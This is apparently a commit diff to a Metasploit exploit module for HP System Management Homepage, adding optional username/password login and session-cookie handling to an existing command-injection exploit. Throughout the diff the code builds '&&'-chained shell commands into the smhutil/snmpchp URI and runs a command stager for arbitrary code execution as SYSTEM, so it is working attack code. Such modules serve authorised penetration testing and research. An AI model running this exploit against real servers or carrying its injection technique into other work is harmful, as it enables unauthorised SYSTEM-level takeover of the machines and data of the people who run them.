Add login feature

Author: wchen-r7

modules/exploits/windows/http/hp_sys_mgmt_exec.rb

@@ -21,7 +21,9 @@ def initialize(info={})
 				supplying a specially crafted HTTP request, it is possible to control the
 				'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
 				which will be used in a exec() function.  This results in arbitrary code execution
-				under the context of SYSTEM.
+				under the context of SYSTEM.  Please note: In order for the exploit to work, the
+				victim must enable the 'tftp' command, which is the case by default for systems
+				such as Windows XP, 2003, etc.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -51,22 +53,48 @@ def initialize(info={})
 			'Privileged'     => false,
 			'DisclosureDate' => "Jun 11 2013",
 			'DefaultTarget'  => 0))
+
 		register_options(
 			[
-				Opt::RPORT(2381)
+				Opt::RPORT(2381),
+				# USERNAME/PASS may not be necessary, because the anonymous access is possible
+				OptString.new("USERNAME", [false, 'The username to authenticate as']),
+				OptString.new("PASSWORD", [false, 'The password to authenticate with'])
 			], self.class)
 	end
 
+
 	def peer
 		"#{rhost}:#{rport}"
 	end
 
+
 	def check
+		cookie = ''
+
+		if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
+			cookie = login
+			if cookie.empty?
+				print_error("#{peer} - Login failed")
+				return Exploit::CheckCode::Safe
+			else
+				print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+			end
+		end
+
 		sig = Rex::Text.rand_text_alpha(10)
 		cmd = Rex::Text.uri_encode("echo #{sig}")
 		uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"
 
-		res = send_request_raw({'uri' => uri})
+		req_opts = {}
+		req_opts['uri'] = uri
+		if not cookie.empty?
+			browser_chk = 'HPSMH-browser-check=done for this session'
+			curl_loc    = "curlocation-#{datastore['USERNAME']}="
+			req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
+		end
+
+		res = send_request_raw(req_opts)
 		if not res
 			print_error("#{peer} - Connection timed out")
 			return Exploit::CheckCode::Unknown
@@ -79,18 +107,71 @@ def check
 		Exploit::CheckCode::Safe
 	end
 
+
+	def login
+		username = datastore['USERNAME']
+		password = datastore['PASSWORD']
+
+		cookie = ''
+
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => '/proxy/ssllogin',
+			'vars_post' => {
+				'redirecturl'         => '',
+				'redirectquerystring' => '',
+				'user'                => username,
+				'password'            => password
+			}
+		})
+
+		if not res
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
+		end
+
+		# CpqElm-Login: success
+		if res.headers['CpqElm-Login'].to_s =~ /success/
+			cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
+		end
+
+		cookie
+	end
+
+
 	def setup_stager
 		execute_cmdstager({ :temp => '.'})
 	end
 
+
 	def execute_command(cmd, opts={})
 		# Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
 		uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
+
+		req_opts = {}
+		req_opts['uri'] = uri
+		if not @cookie.empty?
+			browser_chk = 'HPSMH-browser-check=done for this session'
+			curl_loc    = "curlocation-#{datastore['USERNAME']}="
+			req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
+		end
+
 		print_status("#{peer} - Executing: #{cmd}")
-		res = send_request_raw({'uri' => uri})
+		res = send_request_raw(req_opts)
 	end
 
+
 	def exploit
+		@cookie = ''
+
+		if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
+			@cookie = login
+			if @cookie.empty?
+				fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
+			else
+				print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+			end
+		end
+
 		@uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
 		setup_stager
 	end